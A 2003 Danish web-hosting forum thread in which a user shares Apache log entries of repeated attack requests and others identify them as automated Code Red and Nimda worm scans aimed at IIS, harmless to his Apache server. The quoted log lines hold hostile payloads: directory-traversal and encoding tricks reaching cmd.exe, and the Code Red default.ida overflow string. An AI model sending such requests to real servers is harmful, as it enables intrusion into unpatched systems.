Søg
Avatar billede fangel Nybegynder
09. maj 2003 - 16:22 Der er 19 kommentarer og
1 løsning

en uhyre mængde hacker forsøg...

Hej

sad lige og faldt i staver over min Apache Access.log fil...

jeg har haft 213 hacking forsøg...

hvert eneste ser sådan her ud:

---

80.199.153.228 - - [31/Mar/2003:18:36:54 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
80.199.153.228 - - [31/Mar/2003:18:36:58 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268
80.199.153.228 - - [31/Mar/2003:18:37:22 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
80.199.153.228 - - [31/Mar/2003:18:37:26 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
80.199.153.228 - - [31/Mar/2003:18:37:29 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
80.199.153.228 - - [31/Mar/2003:18:37:32 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
80.199.153.228 - - [31/Mar/2003:18:37:36 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
80.199.153.228 - - [31/Mar/2003:18:37:39 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
80.199.153.228 - - [31/Mar/2003:18:37:45 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
80.199.153.228 - - [31/Mar/2003:18:37:48 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
80.199.153.228 - - [31/Mar/2003:18:37:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
80.199.153.228 - - [31/Mar/2003:18:37:54 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
80.199.153.228 - - [31/Mar/2003:18:38:00 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
80.199.153.228 - - [31/Mar/2003:18:38:03 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
80.199.153.228 - - [31/Mar/2003:18:38:07 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
80.199.153.228 - - [31/Mar/2003:18:38:10 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

---

I kan se en fuld liste over IPer der har angrebet mig på denne adresse (serveren kan være lidt tid om at svare, da listen genereres real-time)
http://mfa.ath.cx/view-my-attacks.php

som I nok kan se ud af IPerne, så er en masse af den fra TDC kunder unden fast IP...

MEN, hvad kan jeg gøre mod sådanne angreb?

Morten
Avatar billede game_tracker Nybegynder
09. maj 2003 - 16:25 #1
hent et firewall
Avatar billede game_tracker Nybegynder
09. maj 2003 - 16:25 #2
http://download.com.com/3120-20-0.html?qt=firewall&tg=dl-2001
Avatar billede fangel Nybegynder
09. maj 2003 - 16:27 #3
jeg har en firewall, men al trafik på port 80 er sat til at gå lige igennem... ;) (grundet at jeg skal bruge min webserver)

hvis I ville vide det er det Agnitum Outpost FREE jeg kører med...

Morten
Avatar billede pbudk Nybegynder
09. maj 2003 - 16:38 #4
Det der er automatiserede angreb fra IIS servere, der er inficeret med Code Red.

Det er fuldstændig harmløst for din Apache, det rammer kun IIS.

Du kan også se at Apache bare svarer med status 404 - Siden blev ikke fundet.

http://www.kriminalitet.dk/cr.html
Avatar billede fangel Nybegynder
09. maj 2003 - 17:24 #5
Ahh...

vidste godt det var ufarligt, men da de blev ved at komme tænkte jeg at der kunne være noget om snakken...

lægger du et svar, så du kan få lidt point for ubelejeliheden... ;)

Morten
Avatar billede pbudk Nybegynder
09. maj 2003 - 17:26 #6
there you go :o)
Avatar billede fangel Nybegynder
09. maj 2003 - 17:42 #7
tak...

(ps, meget funky script jeg har lavet, det der laver en liste over alle angreb, ik'?)

Morten
Avatar billede fangel Nybegynder
09. maj 2003 - 17:54 #8
en sådanne request har også noget med Code Red eller Nimda at gøre, ik'?

???.???.???.??? - - [09/May/2003:16:29:20 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 265

Morten
Avatar billede pbudk Nybegynder
09. maj 2003 - 17:56 #9
Jo - det er også Code Red
Avatar billede fangel Nybegynder
09. maj 2003 - 17:58 #10
pænt lars krimi... får min log fil til at fylde sindsygt meget...

er der nogen forklaring på at næsten alle angreb kommer fra en IP der hedder

80.161.???.???
eller
80.199.???.???

Morten
Avatar billede pbudk Nybegynder
09. maj 2003 - 18:08 #11
Et hurtigt forsigtigt bud kan være (idet jeg kan se, at 80.161 og 80.199 alle er TDC adresser) at du også selv sidder på en tdc adresse.

Personligt får jeg de fleste i min apache log fra 212.10, som er stofanet.
Avatar billede bacce.dk Nybegynder
09. maj 2003 - 18:12 #12
hmm hvorfor du lige får fra disse 2 ip rabge ved jeg ikke,  men jeg har samme problem som dig, mit er bare extremt stort, da der for det første er rigtig mange der sender denne code red afsted til mine domains.
Jeg får utrolig mange MB om dagen i log filer pga den skide code red..
(mon det er generelt at IIS ikke er sikret mod code red ?)
Avatar billede bacce.dk Nybegynder
09. maj 2003 - 18:13 #13
pbudk>> ved ikke om der er noget om det, men jeg sidder på en svensk linie, men det er nu danske ip numre jeg får fra..
Avatar billede fangel Nybegynder
09. maj 2003 - 18:16 #14
JEP... jeg sidder på en TDC linie... er det bare fordi de scanner samme IP range som den selv sidder på?

Da min server ligger på et dundns.org navn, er det begrændset hvor mange jeg får... men kig på listen...

jeg tror at det er ret generalt at alle IIS servere (der ikke har en meget opmærksom IT afdeling tilknyttet) er åben for Code Red...

MEN, da jeg kører Apache er det lige meget! så kunne de lære det kunne de...

Morten
Avatar billede fangel Nybegynder
09. maj 2003 - 18:17 #15
PS jeg har over 27500 linier i min log fil...
Avatar billede pbudk Nybegynder
09. maj 2003 - 18:38 #16
det med rangen var udelukkende et bud baseret på at jeg selv sidder på stofanet og selv har en del entries i min egen apache logfil.

Det er faktisk ikke noget jeg har konkret viden om.

IIS (i hvert fald 5.0) er først sikret når man har kørt feks. MS's eget lockdown tool.
Avatar billede pbudk Nybegynder
09. maj 2003 - 18:43 #17
bacce.dk > altså ip'er der ikke hører til i samme range som din egen ?
Avatar billede bacce.dk Nybegynder
09. maj 2003 - 19:11 #18
yeps..
Jeg kører svensk host / ip nummer, men de code red forsøg jeg får kommer somregel fra danske hosts / ip numrer.
Mit gæt ville være i stil med at disse forsøg muligvis kom fra personer som har set mine www adresser og på en eller anden måde så slugte IIS serveren disse adresser og på den måde blev de brugt?
Men jeg ved det ikke. Ved bare at det somregel er danske ip adresser jeg får disse fra. og meget laangt ude fra min ip range
Avatar billede sukos Juniormester
11. maj 2003 - 23:33 #19
Kan ikke lige finde det, men i manualen er der et sted om at ikke medtage så'n shit i logfilen.
Avatar billede fangel Nybegynder
12. maj 2003 - 07:39 #20
det kunne man godt forestille sig... ;)
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
It-udvikling & AI kurser
Uanset kodesprog, så giver vi dig mulighederne for at udvikle det, du behøver.
Se alle It-udvikling & AI kurser

Flere spørgsmål fra Webservere kategorien

Titel Indlæg Oprettet Seneste aktivitet
HTML-LINKS Af snestrup2000 i Webservere 2 16/11/202415:33 16/11/202418:41
Wordpress fejl Action Scheduler ? Af fimo i Webservere 2 24/10/202410:16 27/10/202412:07
My Cloud Home (hjemme server) Af Erik Hovedskou i Webservere 13 19/10/202419:51 20/10/202419:35
Periodisk lang responstid Af AlbertK i Webservere 3 23/08/202415:54 24/08/202421:48
Yousee Af nu_igen i Webservere 1 08/04/202408:21 09/04/202409:44
Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Opret Log ind

Du kan også logge ind via nedenstående tjenester

Alle kategorier på Eksperten
Seneste spørgsmål Seneste aktivitet
I dag 14:33 install the latest powershell Af casablanca i Windows
I dag 14:15 Opdatering af VEND konto Af ErikHg i Fri debat
I dag 13:26 Hjælp til VBA projekt / macro sikkerhed Af dsj1972 i Excel
I dag 12:33 Hjælp til test og prøve af ny hjemmeside. Af 1122334455 i Webdesign
I går 09:07 CCleaner licens Af Slawomir i Andet software
White papers
Flere white papers »